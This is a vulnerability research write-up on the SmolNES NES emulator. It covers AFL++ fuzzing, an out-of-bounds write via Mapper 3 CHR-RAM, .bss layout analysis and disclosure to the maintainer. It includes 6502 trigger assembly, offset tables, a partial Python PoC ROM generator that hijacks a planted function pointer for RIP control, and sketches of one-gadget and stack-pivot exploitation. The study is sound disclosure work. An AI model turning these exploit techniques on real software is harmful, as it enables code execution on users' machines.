C

2 posts with the tag “C”

Vulnerability Research on SmolNES

Apr 3, 2026

Vulnerability Research on SmolNES

Executive summary

The SmolNES emulator contains multiple memory safety vulnerabilities, including an Out-Of-Bounds Write via Mapper 3 (CHR-RAM) that leads to arbitrary memory corruption when loading a malicious ROM.

In practice, only availability is definitively impacted: a malicious ROM can trigger a reproducible crash. In SmolNES’s memory layout, the GOT and the heap are out of reach, and no exploitable function pointer exists within the range reachable by the overflow.

That said, it makes for an excellent case study, directly transferable to more critical targets with a favorable memory layout: section 9 demonstrates RIP control in a modified binary built to simulate that scenario.

Background and target selection
Setting up the fuzzing environment
First results: initial crashes
Lead 1: OOB Read in PRG-ROM (abandoned)
Source code analysis
Fuzzing iterations and optimizations
Discovering the real vulnerability
Memory mapping and exploitation attempt
PoC on modified binary: RIP control
Responsible Disclosure and CVE
Appendix: Required NES concepts
Resources

1. Background and target selection

Why SmolNES?

SmolNES GitHub page, 776 stars and 3 contributors

The source code is available on GitHub (binji/smolnes).

SmolNES is a NES (Nintendo Entertainment System) emulator written in roughly 700 lines of “golf” C in deobfuscated.c (intentionally compact code). A few characteristics make it an ideal target:

Trivially AFL-fuzzable interface: the program takes a single .nes ROM as its argument (./smolnes <rom.nes>). It’s enough to feed AFL++ with binary files, then pass the generated files directly into smolnes.
Small codebase: the developer explicitly prioritized compactness (the tagline is “NES emulator in <5000 bytes of C”), which almost certainly means bounds checking was skipped.
Hidden complexity: the NES is a complex machine (6502 CPU, PPU, Mapper system). It would be surprising if a project like this, with no security focus, had no bugs.
Few maintainers: the project has only 3 contributors, it’s unlikely any vulnerability research has been done on it before.

The main attack surface identified right away is the iNES file header (the first 16 bytes of a ROM), which configures critical parameters such as memory bank sizes, mapper type, and graphics mode.

2. Setting up the fuzzing environment

Preparing the binary

The SmolNES source includes two versions:

smolnes.c: the official “golfed” version (unreadable)
deobfuscated.c: a readable version with explanatory comments, this is the one I used for research

Two modifications are made to deobfuscated.c before compiling for fuzzing:

Removing SDL calls (Simple DirectMedia Layer, the graphics/audio library): SDL initialization, window creation, rendering, and event polling are commented out. Without this, the program would try to open a window on every execution, making fuzzing too slow to be viable.
Capping the CPU cycle count: a limit is added to the main loop. Without this, a valid ROM would run the emulator forever.

Compiling with AFL++

The instrumented binary is compiled using the environment variables from the provided Makefile:

CC=afl-clang-lto make

afl-clang-lto (Link-Time Optimization) is AFL++‘s highest-performance compiler mode: it inserts instrumentation at link time, yielding better coverage and throughput than afl-cc or afl-clang-fast.

Seed corpus

Free-to-use NES ROMs from the EmuDeck homebrew repository are used as the initial corpus. AFL++ will mutate them automatically to explore new execution paths.

Initial run

afl-fuzz -i games/ -o output_dir/ -- ./smolnes_instru/deobfuscated @@

AFL++ TUI iteration 1: exec speed ~1500/sec, stability 100%, first crashes

The metrics are promising:

~1500 execs/sec: removing SDL was a success
stability 100%: the emulator is deterministic, which is essential for effective fuzzing

3. First results: initial crashes

AFL++ finds its first crashes quickly. Within minutes, 3 unique crash files are saved in output_dir/default/crashes/. After this initial burst, no new unique crashes appear despite dozens of additional minutes of fuzzing.

sig:11 (SIGSEGV) is present on all crashes, indicating an invalid memory access.

4. Lead 1: OOB Read in PRG-ROM (abandoned)

The first crash is loaded into GDB for analysis.

GDB crash OOB Read: fatal instruction movzx, $rax=0x3ffffc

→ movzx  r15d, BYTE PTR [rax+rcx*1+0x10]
; deobfuscated.c:234 : return rom[(prg[hi - 8 >> prgbits - 12] & ...) << prgbits | ...]
; mem(lo=0xfc, hi=0xf, val=0x0, write=0x0), reason: SIGSEGV

This corresponds to the following code:

// deobfuscated.c
return rom[(prg[hi - 8 >> prgbits - 12] & (rombuf[4] << 14 - prgbits) - 1)
               << prgbits |
           addr & (1 << prgbits) - 1];

The emulator attempts to read at index 4,194,300 in rom[], a buffer with a maximum size of 1 MB: this is an Out-Of-Bounds Read.

Root cause: rombuf[4] (5th byte of the iNES header, number of PRG banks) was set to 0x00 by AFL. The emulator then initializes:

prg[1] = rombuf[4] - 1;
// If rombuf[4] == 0 : 0 - 1 = 255 (unsigned underflow)

The PRG-ROM read computation becomes prg[1] * 0x4000 + offset = 255 * 0x4000 + 0x3FFC = 0x3FFFFC, which is exactly the $rax value observed.

Why this lead is abandoned: this crash happens at the very start of execution, during the Reset Vector read (the game’s first instruction). It causes an immediate crash (DoS), but there is no control over the value read or the target address. Additionally, this bug blocks AFL: nearly every mutation generates this same immediate crash, the emulator never actually starts, and AFL cannot explore the deeper execution paths that are of interest.

5. Source code analysis

Before optimizing the fuzzer, it’s necessary to understand the code in order to target the right execution paths. This is a good moment to read the appendix covering the NES architectural concepts, as things get fairly dense from here.

Overview of deobfuscated.c

The code is built around a single large main function that contains the emulator’s main loop, plus a few helper functions.

Initialization: header parsing

// deobfuscated.c
SDL_RWread(SDL_RWFromFile(argv[1], "rb"), rombuf, 1024 * 1024, 1);
// The full ROM file is loaded into rombuf[1024*1024]

rom = rombuf + 16;        // Game code starts after the 16-byte header
prg[1] = rombuf[4] - 1;  // Index of the last PRG bank (header byte 4)

// Header byte 5: number of CHR-ROM banks in the file
// If 0: the game has no CHR-ROM, it uses CHR-RAM (8 KB of RAM)

//                                             v--- CHR-RAM mode: chrrom = chrram[8192]
chrrom = rombuf[5] ? rom + (rombuf[4] << 14) : chrram;
//                   ^--- CHR-ROM mode: chrrom points into the file

chrrom is the base pointer for graphics data access. Its value (either pointing into the ROM file or into chrram) is the pivot of the vulnerability.

The `get_chr_byte()` function

// deobfuscated.c
uint8_t *get_chr_byte(uint16_t a) {
  return &chrrom[chr[a >> chrbits] << chrbits | a % (1 << chrbits)];
}

The parameter a is a 14-bit VRAM address (value between 0 and 16383), representing a position in the PPU’s graphics address space. The variable V plays this role during an access from $2007.

The formula is compact. To understand it, note that a >> chrbits (with chrbits=12) extracts the most significant bit of a on 13 bits, which encodes the bank number. In standard CHR-RAM mode, a is bounded to $0000-$1FFF (8192 values) before the call: a >> 12 can therefore only be 0 or 1, selecting one of the two 4 KB banks. It’s chr[bank_index] that can exceed 1 (the heart of the vulnerability). The << chrbits shift reconstructs the bank base address, and the modulo recovers the intra-bank offset:

// Equivalent readable version (with chrbits = 12, bank size = 4096 bytes):
uint8_t *get_chr_byte_readable(uint16_t a) {
  uint8_t  bank_index = chr[a >> 12];          // bits 12-15 of 'a' -> bank number
  uint32_t bank_base  = bank_index << 12;      // bank_index * 4096
  uint16_t offset     = a & 0xFFF;            // bits 0-11 of 'a' -> offset within bank
  return &chrrom[bank_base + offset];
}

chr[] is an array of graphics bank indices, updated by the Mappers. In CHR-RAM mode, chrrom == chrram and chrram is only 8192 bytes (2 banks of 4096). If bank_index >= 2, then bank_base >= 8192, and the returned pointer goes past the end of chrram.

The central `mem()` function

mem() emulates all 6502 CPU memory accesses. It takes the address (hi:lo), the value to write (val), and the operation direction (write).

// deobfuscated.c (excerpt)
uint8_t mem(uint8_t lo, uint8_t hi, uint8_t val, uint8_t write) {
  uint16_t addr = hi << 8 | lo;

  switch (hi >>= 4) {  // Divide hi by 16 to get the memory "region"

  case 0: case 1: // Region $0000-$1FFF: internal RAM (2 KB, mirrored over 8 KB)
    // The NES physically has only 2 KB of RAM ($0000-$07FF). The remaining 6 KB
    // ($0800-$1FFF) are mirrors: accessing $0800 or $0000 reads the same physical byte.
    return write ? ram[addr] = val : ram[addr];

  case 2: case 3: // Region $2000-$3FFF: PPU registers (mirrored)
    // The 8 PPU registers ($2000-$2007) are mirrored across the entire $2000-$3FFF range.
    // lo &= 7 keeps only the 3 low bits, mapping any address in this range to its
    // corresponding PPU register.
    // Ex: $2015 -> 0x15 & 7 = 5 -> register $2005 (ppuscroll).
    lo &= 7;

    if (lo == 7) { // Register $2007 = PPUDATA (PPU data port)
      // The PPU has a one-cycle read delay: reading $2007 does not immediately return
      // the value at address V, but the value from the previous cycle, stored in ppubuf.
      // The current read is buffered for the next access.
      // Exception: the palette ($3F00+) is returned without buffering.
      // That's why tmp = ppubuf at the start and return tmp at the end.
      tmp = ppubuf;
      uint8_t *rom =
          // If V points into the Pattern Table area (0x0000-0x1FFF):
          V < 8192  ? write && chrrom != chrram
                          ? &tmp              // Write to CHR-ROM: ignore
                                              // (tmp serves as a bit bucket; CHR-ROM
                                              // is read-only on real hardware)
                          : get_chr_byte(V)   // Write to CHR-RAM or any read
          // If V points into the Nametable area (0x2000-0x3EFF):
          : V < 16128 ? get_nametable_byte(V)
          // Otherwise: Palette area (0x3F00+)
                      : palette_ram + (uint8_t)((V & 19) == 16 ? V ^ 16 : V);
      write ? *rom = val : (ppubuf = *rom); // Actual write or read
      V += ppuctrl & 4 ? 32 : 1;  // V auto-increments after each $2007 access
      V %= 16384;  // V stays within the PPU address space (14 bits = 2^14 = 16384)
      return tmp;
    }
    // ... handling of other PPU registers ($2000 ppuctrl, $2006 ppuaddr, etc.)

  case 4: // Region $4000-$4FFF: APU and I/O registers
    // $4016: joypad read (keyboard state in the emulator)
    for (tmp = 0, hi = 8; hi--;)
      tmp = tmp * 2 + key_state[...]; // key_state = pointer to keyboard state

  case 6: case 7: // Region $6000-$7FFF: PRG-RAM (optional cartridge RAM)
    // Two distinct memories, two distinct roles:
    // - Internal RAM ($0000-$1FFF): 2 KB soldered on the motherboard. Game variables,
    //   6502 stack. Present on every NES.
    // - PRG-RAM ($6000-$7FFF): optional 8 KB ON the cartridge. Absent from most games.
    //   When present, often battery-backed to save progress (Zelda, Metroid).
    addr &= 8191; // Keep the 13 low bits (0x1FFF) to address prgram[8192]
    return write ? prgram[addr] = val : prgram[addr];

  default: // Region $8000-$FFFF: ROM + Mapper handling
    // IMPORTANT: writes to the ROM region do not modify the ROM.
    // They are intercepted and interpreted as commands to the Mapper.
    if (write)
      switch (rombuf[6] >> 4) { // Mapper number
      case 7: // Mapper 7 (AxROM)
        // ...
      case 4: // Mapper 4 (MMC3)
        // ...
      case 3: // Mapper 3 (CNROM): CHR bank switching only
        chr[0] = val % 4 * 2; // Even bank (0, 2, 4, or 6)
        chr[1] = chr[0] + 1;  // Next odd bank (1, 3, 5, or 7)
        break;
      case 2: // Mapper 2 (UNROM)
        // ...
      case 1: // Mapper 1 (MMC1)
        // ...
      }
    return rom[(prg[hi - 8 >> prgbits - 12] & (rombuf[4] << 14 - prgbits) - 1)
                   << prgbits |
               addr & (1 << prgbits) - 1];
  }
  return ~0;
}

Key points identified for the vulnerability:

Register $2007 (PPUDATA): this is the PPU’s data port. Writing to $2007 from 6502 code triggers a VRAM write, whose destination is computed by get_chr_byte(V). V is the PPU’s internal address cursor, controlled by writes to $2006 (PPUADDR).
Mapper 3: any write anywhere in $8000-$FFFF modifies chr[0] without bounds checking. With val=0x01 (or any val such that val % 4 == 1), chr[0] = 0x01 % 4 * 2 = 2.
The partial safety check: write && chrrom != chrram ? &tmp : get_chr_byte(V). If chrrom == chrram (CHR-RAM mode), the write goes through get_chr_byte with no bounds check on the bank index. This is the only case where a write can go out of bounds.

6. Fuzzing iterations and optimizations

Iteration 1: SDL removal + cycle cap (result: 3 crashes, then stall)

The first harness version simply removes SDL graphics calls and adds a cycle limit. AFL++ quickly finds 3 unique crashes (all related to the OOB Read in PRG-ROM described in section 4), then stalls.

Reason for the stall: the emulator crashes too early. When rombuf[4]=0, the NES CPU never really starts: it reads an invalid Reset Vector and immediately tries to access 4 MB of PRG-ROM. AFL cannot explore the deeper execution paths (like the 6502 code that writes to $2007).

Iteration 2: header patches + ASAN + 6502 dictionary

Knowing the code better, several additional modifications are made.

Header patches in the harness (applied after reading the file):

// Prevent PRG underflow and the immediate $FFFC crash
if (rombuf[4] == 0 || rombuf[4] > 64) rombuf[4] = 1;
// Force CHR-RAM mode: chrrom = chrram, which activates the path through get_chr_byte()
rombuf[5] = 0;
// Force Mapper 3 (CNROM), preserve the mirroring bit
rombuf[6] = (rombuf[6] & 0x01) | 0x30;

These three patches steer AFL toward the vulnerable path:

rombuf[4] clamped: prevents the immediate PRG crash
rombuf[5] = 0: ensures chrrom == chrram, a necessary condition for the OOB Write
rombuf[6] = 0x3X: forces Mapper 3, enabling CHR bank switching without bounds checking

Note on rombuf[4] > 64: the value is capped at 64 banks maximum. This limit exactly matches the rombuf buffer size (1 MB / 16 KB per bank = 64 banks). Beyond that, index calculations would exceed the allocated megabyte. This is not an official NES limit (real NES ROMs have at most 32 PRG banks), it’s a safety bound derived from the buffer size.

Compiling with ASAN:

AFL_USE_ASAN=1 CC=afl-clang-lto make

Without ASAN, an OOB Write will silently write into adjacent memory without an immediate crash if the overwritten region contains data the process can read. ASAN detects the out-of-bounds access at the very first overflowed byte, making the crash systematic.

The trade-off is a performance drop: ~300 execs/sec instead of ~1500. Further optimizations could improve this, but it wasn’t necessary given that enough crashes were found at this reduced speed.

AFL++ dictionary (nes6502.dict):

# iNES header
magic="NES\x1a"
mapper3="\x30"

# 6502 write opcodes
op_sta_abs="\x8D"
op_stx_abs="\x8E"

# NES register addresses
ppu_addr="\x06\x20"   # $2006: PPUADDR
ppu_data="\x07\x20"   # $2007: PPUDATA
mapper_reg="\x00\x80" # $8000: Mapper 3 register

#...
# The actual dictionary I used was considerably larger

Without the dictionary, AFL has to stumble upon the sequence 8D 07 20 (STA $2007) by chance among 16,777,216 possible 3-byte combinations. With the dictionary, it inserts it directly.

Surface bug hotfixes:

Two additional bugs were identified and hotfixed in the harness to let ASAN reach the target bug:

OOB Write in palette_ram: the index (uint8_t)(...) can be up to 255, but palette_ram is only 64 bytes. Hotfix: & 63 to clamp the index.
OOB Read in PRG-ROM: the computed index in the PRG formula can exceed 1 MB. Hotfix: add a bounds check before the return.

Both bugs are real (confirmed on legitimate, unmodified ROMs), but of lesser interest: the first is a write with a limited range (~191 bytes maximum), the second is a read with no control over the value returned.

Result: AFL++ finds the CHR-RAM OOB Write crash very quickly.

AFL++ TUI iteration 2: CHR-RAM OOB Write crash found with ASAN + dictionary + header patches

7. Discovering the real vulnerability: OOB Write via Mapper 3 CHR-RAM

The ASAN crash

With the patched binary (ASAN + forced Mapper 3 + forced CHR-RAM), AFL++ produces a new type of crash. Replayed under GDB with ASAN, it reveals:

ASAN: global-buffer-overflow WRITE 0 bytes after chrram

==ERROR: AddressSanitizer: global-buffer-overflow
WRITE of size 1 at 0x55555628c9a0 thread T0
    #0 in mem deobfuscated.c:92
0x55555628c9a0 is located 0 bytes after global variable 'chrram' (size 8192)

Unlike the previous crashes (READ), this one is a WRITE. It lands exactly at chrram[8192], the first byte past the end of the array.

The stack trace (#0) points to line 92 of mem():

write ? *rom = val : (ppubuf = *rom);  // line 92

Here, rom is the pointer returned by get_chr_byte(V), whose value has gone past the bounds of chrram. ASAN interrupts execution at the exact moment of the write.

Root cause: `get_chr_byte()` without bounds checking

In CHR-RAM mode (chrrom == chrram, from rombuf[5] = 0) with Mapper 3 active (rombuf[6] >> 4 == 3), any CPU write to $8000-$FFFF modifies the CHR banks:

case 3: // mapper 3
    chr[0] = val % 4 * 2;
    chr[1] = chr[0] + 1;
    break;

val is entirely controlled by the ROM. The possible values of chr[0] and their consequences:

val written	chr[0]	base offset into chrram	out-of-bounds?	OOB range
val%4 = 0	0	0	no	-
val%4 = 1	2	8192	yes	+4095 B
val%4 = 2	4	16384	yes	+12287 B
val%4 = 3	6	24576	yes	+20479 B

There is no check that chr[0] stays within the physical bounds of chrram.

Trigger conditions

Three conditions, all satisfiable by a malicious ROM:

rombuf[5] == 0 (iNES header byte 5, controlled by the ROM): enables CHR-RAM mode
rombuf[6] >> 4 == 3 (high nibble of header byte 6, controlled by the ROM): enables Mapper 3
The PPU writes via $2007 with V in $0000-$1FFF after a Mapper write that set chr[0] >= 2

Write address control

The target address is fully derivable from two controllable parameters:

address = &chrram[ chr[V >> 12] * 4096 + (V & 0xFFF) ]

val written to $8000+: determines chr[0] (0, 2, 4, or 6)
V: positioned by two consecutive writes to $2006

Granularity is one byte. The written value (from the 6502’s A, X, or Y register) is also controlled by the ROM.

Demonstration: minimal 6502 assembly

The following sequence triggers an OOB Write at the first byte after chrram. iNES header: 1 PRG bank (rombuf[4] = 1), 0 CHR banks (rombuf[5] = 0), Mapper 3 (rombuf[6] = 0x30).

; Entry point (Reset Vector at $FFFC points here)

; Step 1: select the CHR bank via Mapper 3
; val=1 => chr[0] = 1%4*2 = 2 => base offset = 2*4096 = 8192 (first OOB byte)
LDA #$01         ; $A9 $01
STA $8000        ; $8D $00 $80 -> Mapper 3: chr[0]=2, chr[1]=3

; Step 2: set V via two consecutive writes to $2006
LDA #$00         ; $A9 $00
STA $2006        ; $8D $06 $20  (high byte: $00)
LDA #$00         ; $A9 $00
STA $2006        ; $8D $06 $20  (low byte: $00) => V = $0000

; Step 3: write via $2007 (PPUDATA)
; get_chr_byte($0000) = &chrram[2*4096 + 0] = &chrram[8192] -> OOB
LDA #$41         ; $A9 $41  (value to write)
STA $2007        ; $8D $07 $20 -> WRITE to chrram[8192]

To target a different offset:

target (offset from start of chrram)	val at $8000	V via $2006
8192 + N (N < 4096)	$01 (chr[0]=2)	$0000-$0FFF
16384 + N (N < 4096)	$02 (chr[0]=4)	$0000-$0FFF
24576 + N (N < 4096)	$03 (chr[0]=6)	$0000-$0FFF

8. Memory mapping and exploitation attempt

.bss section layout

GDB: addresses of global variables in the .bss section

The order of global variables in memory (.bss section, confirmed via GDB on the release binary):

0x55555567a220  chrram      [8192 bytes]  <- start of the overflow region
0x55555567c220  ram         [8192 bytes]
0x55555567e220  palette_ram [64 bytes]
0x55555567e260  vram        [2048 bytes]
0x55555567ea60  ptb_lo      [1 byte]
0x55555567ea70  addr_lo     [1 byte]
0x55555567ea80  prg         [4 bytes]
0x55555567ea90  rom         [8 bytes]  (pointer)
...

Maximum overflow range with Mapper 3: chr[0] max = 6, range = 6 * 4096 + 4095 = 28671 bytes beyond the start of chrram, i.e. ~20 KB out-of-bounds.

The GOT is out of reach

The natural first target for an OOB Write is the GOT (Global Offset Table), which holds the addresses of libc functions. Overwriting a GOT entry redirects a function call to arbitrary code.

GDB: GOT located before the .bss section, out of reach

gef➤  p/d 0x555555559fc0 - 0x55555567a220 # GOT - chrram
$5 = -1180256   # Negative value (~-1.1 MB)

The GOT is located approximately 1.1 MB before chrram in memory. Since the OOB Write can only reach addresses at positive offsets from chrram, the GOT is inaccessible.

The heap is out of reach

The heap (dynamically allocated by SDL at startup) is another potential target: it may contain function pointers or exploitable allocator metadata.

Distance chrram -> heap start: 0x23e749f0 ~ 574 MB

As expected, ASLR places the heap several hundred megabytes away from the .bss section. The maximum OOB range (~20 KB with Mapper 3) is nowhere near that distance.

Analysis of variables within range

In the ~20 KB reachable after chrram, the variables present are integer arrays (ram, palette_ram, vram) and scalars (ptb_lo, addr_lo, 6502 registers, prg). Overwriting them disrupts emulation but provides no useful primitive: no function pointer is present in this region.

One variable stands out, though: the pointer *rom, located ~18 KB after chrram. It points to the start of the PRG data inside rombuf and is used for offset calculations. Overwriting it would change the base for address arithmetic, potentially enabling access to arbitrary memory, but it would also alter where instructions are read from. This primitive self-destructs upon use.

Impact assessment

Guaranteed DoS: reproducible crash with a malicious .nes ROM, confirmed via ASAN
Memory corruption: up to ~20 KB of global variables can be overwritten, disrupting emulation arbitrarily
Direct RCE: not achievable with this memory layout (GOT and heap out of reach, no function pointer in the reachable region)

9. PoC on modified binary: RIP control

SmolNES’s memory layout contains no function pointer within the overflow’s reach. To illustrate the vulnerability’s potential in a favorable scenario, a function pointer is manually added to deobfuscated.c’s source, in the .bss section immediately after chrram. This pointer does not exist in the original binary. A malicious ROM overwrites it with 0xdeadbeef, giving control of RIP (the instruction pointer register on x86_64) on the next call.

Code modification

The modification spans three files. The function pointer is declared in a separate compilation unit (poc_hook.c) to ensure the linker places its .bss after that of deobfuscated.o, and therefore at a higher address than chrram.

poc_hook.h:

typedef void (*render_hook_t)(void);
extern render_hook_t render_hook;

poc_hook.c:

typedef void (*render_hook_t)(void);
render_hook_t render_hook;

Full diff:

diff --git a/Makefile b/Makefile
--- a/Makefile
+++ b/Makefile
@@ -18,8 +18,8 @@
-deobfuscated: deobfuscated.c
-       $(CC) -O2 -o $@ $< ${SDLFLAGS} -g ${WARN}
+deobfuscated: deobfuscated.c poc_hook.c
+       $(CC) -O2 -o $@ deobfuscated.c poc_hook.c ${SDLFLAGS} -g ${WARN}

diff --git a/deobfuscated.c b/deobfuscated.c
--- a/deobfuscated.c
+++ b/deobfuscated.c
@@ -1,5 +1,6 @@
 #include <SDL2/SDL.h>
 #include <stdint.h>
+#include "poc_hook.h"

@@ -691,6 +691,8 @@
         SDL_RenderPresent(renderer);
+        // [POC] Call render hook if defined
+        if (render_hook) render_hook();
         // Handle SDL events.

Two points to note:

Makefile: poc_hook.c is added as an explicit source. The linker places poc_hook.o’s .bss after deobfuscated.o’s, guaranteeing that render_hook ends up at an address higher than all variables in deobfuscated.c, including chrram.
Call site: the hook is called after each SDL_RenderPresent, i.e. once per frame (scanline 241). That’s the natural moment for an emulator to expose this kind of callback.

This pattern is realistic: many emulators expose such callbacks for debugging tools, save states, or GUI frontends.

Malicious ROM

The ROM is generated by the make_poc_rom.py script (see Resources). It takes the offset of render_hook from chrram in the target binary’s .bss, then writes the 8 bytes of 0xdeadbeef via successive writes to $2007, incrementing V by 1 each time (auto-increment after each PPUDATA access).

Result

RIP is controlled. The emulator jumped to the address supplied by the malicious ROM.

Toward a full exploit

Controlling RIP is not enough to execute arbitrary code on a modern system: ASLR and the NX bit are highly effective mitigations.

Two classic approaches to go further:

Option 1: One-gadget

A “one-gadget” is a gadget in libc that, when called, executes execve("/bin/sh", NULL, NULL) if certain register conditions are met. Pointing render_hook at this gadget would yield a shell without a ROP chain, given a libc address leak is available to bypass ASLR. In a real-world context, the end goal is usually not a local shell but persistence or remote access; the one-gadget remains a valid tool, it’s the post-exploitation action that changes.

Option 2: Stack pivot into rombuf

The real alternative is a stack pivot: find a gadget that places rsp (the stack pointer) into a memory region whose contents we control. rombuf is a 1 MB array (fully controlled by the malicious ROM) located in .bss. A gadget of the form mov rsp, [address_in_bss] ; ret would pivot the stack into rombuf and allow executing an arbitrary ROP chain, leading to code execution. This scenario is reinforced by the fact that rom is a global pointer (in .bss) that already points into rombuf: a gadget dereferencing this known address is enough to place rsp in the controlled region.

10. Responsible Disclosure and CVE

Reporting to the maintainer

The vulnerabilities described in this write-up were reported to the project’s maintainer (binji/smolnes) by email before this article was published. His response, unsurprisingly for a code golf project, was that he “wasn’t too worried about OOB in smolnes”. He authorized me to publish this write-up.

Why no CVE was requested

These vulnerabilities technically meet the criteria for CVE assignment: they are reproducible, documented, and the impact (guaranteed DoS, memory corruption) is real.

However, filing a CVE would have been counterproductive in this case. SmolNES is a hobby code golf project with 3 contributors, designed as a compactness exercise and not intended for production deployment. There is no proven critical exploitation path in the binary as distributed (the GOT and heap are out of reach, no function pointer exists in the reachable region).

Given the nature of the project and the absence of a critical exploitation path, I decided not to pollute the ecosystem with a pointless CVE.

This aligns with what this article describes well: CVSS scores are calculated for the worst-case deployment scenario, regardless of actual context. The author himself acknowledges that some CVEs “have no viable exploitation path or deployment, and frankly waste everyone’s time.” A hobby NES emulator is the perfect example.

11. Appendix: Required NES concepts

This appendix covers the NES architectural concepts required to understand the vulnerability.

A. NES general architecture

The NES (Nintendo Entertainment System, 1983) is made up of three main components:

CPU: a Ricoh 2A03, derived from the MOS Technology 6502. 8-bit processor, 16-bit address bus (64 KB address space).
PPU (Picture Processing Unit): the Ricoh 2C02, handles display. It has its own 16 KB address space, separate from the CPU’s.
APU (Audio Processing Unit): integrated into the CPU, handles sound (5 channels).

The game is stored on a cartridge containing two types of memory:

PRG-ROM: the game code and program data (read by the CPU via $8000-$FFFF)
CHR-ROM or CHR-RAM: the graphics data (tiles, sprites), accessed by the PPU

B. The 6502 CPU and its address space

The CPU addresses 64 KB (0x0000 to 0xFFFF), broken down as follows:

$0000 - $07FF : Internal RAM (2 KB, mirrored over $0000-$1FFF)
$2000 - $2007 : PPU registers (mirrored across the entire $2000-$3FFF range)
$4000 - $4017 : APU and I/O registers (joypads, DMA)
$6000 - $7FFF : PRG-RAM (optional cartridge RAM)
$8000 - $FFFF : PRG-ROM (game code) + Mapper registers

The Reset Vector: when the NES powers on, the CPU reads the two bytes at $FFFC-$FFFD and jumps to the address they contain. That’s the game’s entry point.

6502 instructions relevant to the vulnerability:

LDA #val (opcode A9): loads an immediate value into accumulator A
STA $addr (opcode 8D + 2 little-endian bytes): writes A to absolute memory
INC $addr,X (opcode FE + 2 bytes): reads, increments, and writes back the memory value (Read-Modify-Write)

prg[] and memory windows:

prg is an array whose elements contain the number of a PRG bank currently mapped into CPU memory. A PRG bank is 16 KB. Example:

prg[0] = 2;  // the $8000-$BFFF range points to bank 2 of the ROM
prg[1] = 5;  // the $C000-$FFFF range points to bank 5 of the ROM

C. The PPU and VRAM

The PPU manages the display through its own 16 KB address space:

$0000 - $1FFF : Pattern Tables (CHR: 8x8 pixel tiles, 2 banks of 4 KB)
$2000 - $3EFF : Nametables (screen map)
$3F00 - $3FFF : Palette RAM (32 active colors)

Registers $2006 (PPUADDR) and $2007 (PPUDATA)

The CPU cannot directly access VRAM. It communicates with the PPU through memory-mapped registers in the $2000-$2007 range:

$2006 (PPUADDR): sets the target address in VRAM via two consecutive writes (toggle controlled by bit W):

First write  -> high byte of the address (stored in T, temporary register)
Second write -> low byte + copy of T into V (V = active address)

case 6: // $2006 PPUADDR
    T = (W ^= 1)
      ? T & 0xff | val % 64 << 8   // 1st write: bits 8-13 of T
      : (V = T & ~0xff | val);     // 2nd write: bits 0-7 of T, then V = T

$2007 (PPUDATA): reads or writes one byte at the address pointed to by V. After each access, V auto-increments:

V += ppuctrl & 4 ? 32 : 1;
V %= 16384;  // 16384 = 2^14: the PPU space is 14 bits wide (0 to 16383)

This auto-increment mechanism allows writing consecutive byte sequences to VRAM with only repeated STA $2007 instructions.

D. Mappers

The NES only has 32 KB for PRG-ROM and 8 KB for CHR. But some games need much more (Super Mario Bros 3: 384 KB of PRG).

The solution: Mappers, extra chips inside the cartridge that enable bank switching. The CPU always sees the same addresses ($8000-$FFFF), but the Mapper can connect different chunks of the ROM to those addresses.

How the game controls the Mapper: writes to the ROM region ($8000-$FFFF) do not modify the ROM (read-only). This behavior is repurposed: writes are intercepted and interpreted as bank switching commands. This is Memory-Mapped I/O (MMIO).

In SmolNES, the Mapper number is encoded in bits 4-7 of iNES header byte 6 (rombuf[6] >> 4).

E. CHR-ROM vs CHR-RAM

CHR-ROM: most games store their graphics in a dedicated ROM chip on the cartridge. Graphics are fixed. chrrom points into the ROM file buffer.

CHR-RAM: some games (such as Zelda II, Metroid) have no graphics chip. They use the NES’s internal RAM (8 KB), which allows them to modify their graphics dynamically. chrrom then points to chrram[8192].

In SmolNES, header byte 5 (rombuf[5]) determines the mode:

chrrom = rombuf[5] ? rom + (rombuf[4] << 14) : chrram;
//       ^if != 0: CHR-ROM from the file       ^if 0: CHR-RAM (static 8 KB)

This distinction is at the heart of the vulnerability: Mappers allow selecting among multiple CHR banks. In CHR-ROM mode, having multiple banks is normal : the ROM file can contain many. But in CHR-RAM mode, there are only 2 physical banks (0 and 1, i.e. 8 KB). Selecting bank 2 goes past the end of chrram[8192].

F. Mapper 3 (CNROM)

Mapper 3, also known as CNROM, is one of the simplest. It only manages the CHR bank. Any write to $8000-$FFFF changes the active graphics bank:

case 3: // mapper 3 (CNROM)
    chr[0] = val % 4 * 2;   // val % 4 gives 0, 1, 2, or 3; * 2 gives 0, 2, 4, or 6
    chr[1] = chr[0] + 1;    // Next bank: 1, 3, 5, or 7
    break;

// CHR bank is selected in pairs (two 4 KB sub-banks)
// Bank 0: chr[0]=0, chr[1]=1  (offsets 0 and 4096 into chrram -> valid)
// Bank 1: chr[0]=2, chr[1]=3  (offsets 8192 and 12288          -> OVERFLOW if CHR-RAM)
// Bank 2: chr[0]=4, chr[1]=5  (offsets 16384 and 20480         -> even further)
// Bank 3: chr[0]=6, chr[1]=7  (offsets 24576 and 28672         -> maximum range)

In CHR-ROM mode, all these offsets are valid. In CHR-RAM mode, only offsets 0 and 4096 (bank 0) are valid.

G. The iNES file format

A .nes file begins with a 16-byte header:

Offset  Size  Description
0       4     "NES\x1A" (magic number)
4       1     Number of PRG-ROM banks (16 KB each)
5       1     Number of CHR-ROM banks (8 KB each). 0 = CHR-RAM mode
6       1     Flags:
                bit 0    : mirroring (0=horizontal, 1=vertical)
                bit 1    : battery (persistent PRG-RAM)
                bit 2    : trainer (512 bytes before PRG-ROM)
                bits 4-7 : low nibble of Mapper number
7       1     Flags:
                bits 4-7 : high nibble of Mapper number
8-15    8     Unused (base iNES format)

In SmolNES, these values are read from rombuf without validation and used directly to configure the emulator.

12. Resources

PoC script for modified binary

#!/usr/bin/env python3
"""
PoC ROM for smolnes: OOB Write via Mapper 3 CHR-RAM -> overwrite render_hook.

.bss layout (smolnes/deobfuscated binary compiled with poc_hook.c as second source):
  chrram      : offset 0       (8192 bytes)
  render_hook : offset 18552   (8 bytes, uint8_t*)

Parameters:
  - Mapper 3 active (rombuf[6] >> 4 == 3)
  - CHR-RAM mode (rombuf[5] == 0) => chrrom = chrram
  - val=2 written to $8000 => chr[0] = 2%4*2 = 4
  - V = 0x0878 (via two $2006 writes)
  - get_chr_byte(0x0878) = &chrram[chr[0]*4096 + 0x878] = &chrram[18552] = &render_hook

Target: write 0xDEADBEEF into render_hook (little-endian, 8 bytes).
Trigger: when scany==241, dot==1, smolnes calls render_hook() => SIGSEGV.
"""

TARGET_ADDR = 0xDEADBEEF

# ---- Parameter calculation ----
CHRRAM_SIZE   = 8192
HOOK_OFFSET   = 18552                # p/d (long)&render_hook - (long)&chrram
BANK_INDEX    = HOOK_OFFSET // 4096  # = 4 (chr[0] to reach)
